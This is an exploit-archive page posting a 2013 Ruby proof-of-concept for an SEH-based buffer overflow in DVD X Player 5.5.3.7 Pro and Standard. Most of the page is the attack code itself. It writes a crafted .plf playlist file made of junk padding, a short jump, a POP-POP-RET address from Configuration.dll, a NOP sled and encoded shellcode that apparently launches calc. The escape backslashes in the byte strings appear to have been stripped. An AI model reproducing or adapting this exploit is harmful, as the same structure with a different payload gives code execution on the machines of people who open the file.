Home / exploits DVD X Player 5.5.37 Pro / Standard Buffer Overflow
Posted on 04 May 2013
#!/usr/bin/env ruby # Exploit Title:DVD X Player 5.5.3.7 Pro & Standard (SEH) Buffer Overflow # Download link :http://www.aviosoft.com/dvd-player.html # RST # Author: metacom # Date (found):03.05.2013 # Date (publish):03.05.2013 # version: 5.5.3.7 Pro & Standard # Category: poc # Tested on: windows 7 German # Notes: Last Update DVD X Player Jan 28, 2012 # SOLUTION: None calc = "xbax38xdcx15x77xddxc7xd9x74x24xf4x5dx33xc9" + "xb1x33x83xc5x04x31x55x0ex03x6dxd2xf7x82x71" + "x02x7ex6cx89xd3xe1xe4x6cxe2x33x92xe5x57x84" + "xd0xabx5bx6fxb4x5fxefx1dx11x50x58xabx47x5f" + "x59x1dx48x33x99x3fx34x49xcex9fx05x82x03xe1" + "x42xfexecxb3x1bx75x5ex24x2fxcbx63x45xffx40" + "xdbx3dx7ax96xa8xf7x85xc6x01x83xcexfex2axcb" + "xeexffxffx0fxd2xb6x74xfbxa0x49x5dx35x48x78" + "xa1x9ax77xb5x2cxe2xb0x71xcfx91xcax82x72xa2" + "x08xf9xa8x27x8dx59x3ax9fx75x58xefx46xfdx56" + "x44x0cx59x7ax5bxc1xd1x86xd0xe4x35x0fxa2xc2" + "x91x54x70x6ax83x30xd7x93xd3x9cx88x31x9fx0e" + "xdcx40xc2x44x23xc0x78x21x23xdax82x01x4cxeb" + "x09xcex0bxf4xdbxabxe4xbex46x9dx6cx67x13x9c" + "xf0x98xc9xe2x0cx1bxf8x9axeax03x89x9fxb7x83" + "x61xedxa8x61x86x42xc8xa3xe5x05x5ax2fxc4xa0" + "xdaxcax18" junk = "x41" * 601 # Junk bytes nseh = "xEBx06x90x90" # Short (6 bytes) jump! seh = "xB8x22x30x60"#0x603022B8 5E POP ESI from Configuration.dll nops = "x90" * 50 head = "http://" data= head + junk + nseh + seh + nops + calc File.open("crash.plf", 'w') do |b| b.write data puts "file size : " + data.length.to_s end
